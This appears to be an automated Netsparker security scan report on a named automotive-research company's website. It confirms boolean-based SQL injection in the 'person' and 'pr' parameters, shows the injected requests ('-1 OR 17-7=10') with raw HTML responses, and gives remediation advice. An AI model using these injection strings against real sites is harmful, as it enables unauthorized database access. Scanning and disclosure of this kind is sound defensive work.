<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011" selected>2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option><option value="Acura">Acura</option><option value="Audi">Audi</option><option value="BMW">BMW</option><option value="Buick">Buick</option><option value="Cadillac">Cadillac</option><option value="Chevrolet">Chevrolet</option><option value="Chrysler">Chrysler</option><option value="Dodge">Dodge</option><option value="Ford">Ford</option><option value="GMC">GMC</option><option value="Honda">Honda</option><option value="Hyundai">Hyundai</option><option value="Infiniti">Infiniti</option><option value="Jaguar">Jaguar</option><option value="Jeep">Jeep</option><option value="Kia">Kia</option><option value="Land Rover">Land Rover</option><option value="Lexus">Lexus</option><option value="Lincoln">Lincoln</option><option value="Mazda">Mazda</option><option value="Mercedes-Benz">Mercedes-Benz</option><option value="Mercury">Mercury</option><option value="MINI">MINI</option><option value="Mitsubishi">Mitsubishi</option><option value="Nissan">Nissan</option><option value="Porsche">Porsche</option><option value="Ram">Ram</option><option value="Saab">Saab</option><option value="Scion">Scion</option><option value="Segment">Segment</option><option value="Subaru">Subaru</option><option value="Suzuki">Suzuki</option><option value="Toyota">Toyota</option><option value="Volkswagen">Volkswagen</option><option value="Volvo">Volvo</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option><option value="Civic Hybrid">Civic Hybrid</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidde..
Boolean Based SQL Injection

Boolean Based SQL Injection

3 TOTAL
CRITICAL
CONFIRMED
3
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /team.php

/team.php CONFIRMED

http://www.strategicvision.com/team.php?person=-1+OR+17-7%3d10

Parameters

Parameter Type Value
person GET -1 OR 17-7=10

Request

GET /team.php?person=-1+OR+17-7%3d10 HTTP/1.1
Referer: http://www.strategicvision.com/clients.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:50:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Darrel Edwards, Ph.D.</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">COMPANY</div><div class="sidemenu_item"><a href="company.php">Overview</a></div><div class="sidemenu_item"> <a href="team.php">Team</a></div><div class="sidemenu_item"><a href="clients.php">Clients</a></div><div class="sidemenu_item"><a href="charity.php">Charity</a></div><div class="sidemenu_item"><a href="press_contacts.php">Press Contacts</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td> <td align="left" valign="top"> <!-- Start the content --> <a name="top"></a> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Darrel Edwards, Ph.D.</div> <div class="pagetext"> <p>
Dr. Darrel Edwards is the founding partner of Strategic Vision, Inc., a consulting and research firm based in San Diego, California.
</p>
<p>
Dr. Edwards developed his ValueCentered methodology earlier in his career
and established research organizations in this approach worldwide beginning
in 1973. The basic premise of the method is that the individual's personal
values are at the core of their personal decisions. The ValueCentered approach
is the cornerstone of Strategic Vision today.
</p>
<p>
He is an expert in motivation and decision making, research and communications;in
customer satisfaction, retention, loyalty, commitment and decision making;
and research design, data structrue, analysis and inference. He has applied
the ValueCentered procedures in many fields: accounting, airlines, the automotive
industry, banking, education, entertainment, food and beverages, health and
beauty, law, leadership, medicine, politics, restaurants, recreation, and
telecommunications.
</p>
<p>
His analyses lead to the development of innovative concepts as (1) thoughtful engineering/design, and (2) total quality in the automotive industry.
</p>
<p>
He has made professional presentations to the widest variety of audiences from world leaders, corporate CEO's, advertising creative pros, and corporate and academic researchers and managers.
</p>
<p>
His work and academic background:
</p>

<ul>
<li>B.A. in Psychology and Philosophy, Brigham Young University, 1965</li>
<li>M.A. Psychology and Philosophy, BYU, 1967</li>
<li>Ph.D. Clinical Psychology and Philosophy, BYU, 1968</li>
<li>Diplomate Clinical Psychology, American Board of Professional Psychology, 1978</li>

<li>Who's Who...
<ul>
<li>In the World</li>
<li>In the USA</li>
<li>In the West</li>
<li>In Science and Engineering</li>
<li>In Medicine and Healthcare</li>
<li>of Emerging Leaders in America</li>
</ul>
</li>
</ul>

1973 to date
<ul>
<li>Fellow of the National Aeronautic and Space Administration - Decision Making and problem solving strategies, 1965-1968</li>
<li>Post-Doctoral Research Fellow in verbal learning and behavior, psycholinguistics, The Pennsylvania State University, 1968-69</li>
<li>Post-Doctoral Clinical Fellow in clinical psychology USNH, Bethesda, MD, 1969-70, USN</li>
<li>Head of Clinical Decision Branch and Assistant Director of Health Decision, Naval Medical Research Center, 1970-78</li>
<li>Established ValueCentered research organizations worldwide, including Australia,
Canada, China, Colombia, Costa Rica, England, France, Germany, Italy, Japan,
Kenya, Mexico, Russia, 1973 to date. </li>
<li>"2000 Outstanding Scientists of the 20th Century" awarded by the International Biographical Centre, Cambridge, England.</li>
</ul> </div> <p><a href="#top">^ back to top</a></p> <!-- End the page --> </td> <td width="150" valign="top"> </td> </tr></table> <hr noshade size="1" color="#DDDDDD" width="760" align="center" /><table id="footertable" align="center"> <tr> <td align="left" valign="top" width="50%"> <a href="sitemap.php" class="footer">SITE MAP</a> &nbsp; | &nbsp; <!--<a href="privacy.php" class="footer">PRIVACY POLICY</a> &nbsp; | &nbsp; --> <a href="press_contacts.php" class="footer">CONTACT US</a> &nbsp; | &nbsp;<a href="admin.php" class="footer">ADMIN</a> &nbsp; | &nbsp; <a href="privacy.php" class="footer">PRIVACY</a> </td> <td align="right" valign="top" width="50%"> &copy; 2004-2011 Strategic Vision, Inc.<br /> Site by <!--<a href="http://www.nickbarrett.org" title="Nick Barrett" target="_blank" class="footer">Nick Barrett</a> &amp;--><a href="mailto:pgossling@gmail.com" class="footer">Philip Gossling</a> </td> </tr></table> </div> </td> <td width="5" bgcolor="#CCCCCC" background="images/content_rightshadow.gif">&nbsp;</td> </tr></table> </center> </body></html>
- /press_release.php

/press_release.php CONFIRMED

http://www.strategicvision.com/press_release.php?pr=-1+OR+17-7%3d10

Parameters

Parameter Type Value
pr GET -1 OR 17-7=10

Request

GET /press_release.php?pr=-1+OR+17-7%3d10 HTTP/1.1
Referer: http://www.strategicvision.com/auto_research.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:51:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Press Releases - The 2004 Total Quality Awards�</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">PRESS</div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"> <a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="press_contacts.php">Press Contacts</a></div><div class="sidemenu_item"><a href="press_rss.php">RSS Feeds</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td> <td align="left" valign="top"> 